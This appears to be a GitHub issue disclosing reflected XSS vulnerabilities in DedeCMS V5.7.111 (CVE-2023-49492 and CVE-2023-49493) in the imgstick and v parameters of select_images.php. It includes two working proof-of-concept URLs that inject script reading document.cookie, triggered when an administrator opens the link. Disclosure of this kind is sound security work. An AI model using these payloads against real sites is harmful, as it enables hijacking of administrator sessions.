Hebing123
commented
10 months ago These are vulnerability exploitation references for CVE-2023-49492 and CVE-2023-49493.
Open Hebing123 opened 1 year ago
Hebing123
commented
10 months ago These are vulnerability exploitation references for CVE-2023-49492 and CVE-2023-49493.
Hebing123
commented
6 months ago Note: The activepath changes depending on whether the site runs in the uploads directory.
Description DedeCMS-V5.7.111 has Reflective XSS vulnerabilities in imgstick and v parameters of selectimages.php
Proof of Concept http://target-ip/uploads/include/dialog/select_images.php?activepath=/uploads/uploads/allimg&f=form1.pic1&imgstick=smallundefined%27%3E%3CScRiPt%20%3Ealert(document.cookie)%3C/ScRiPt%3E//
http://target-ip/uploads/include/dialog/select_images.php?activepath=/uploads/uploads/allimg&f=form1.pic1&imgstick=smallundefined&noeditor=yes&v=picview%3CScRiPt%20%3Ealert(document.cookie)%3C/ScRiPt%3E
Reflective XSS vulnerability in imgstick and v parameters of select_images.php
Impact Reflective XSS vulnerability triggered by administrator accessing the link.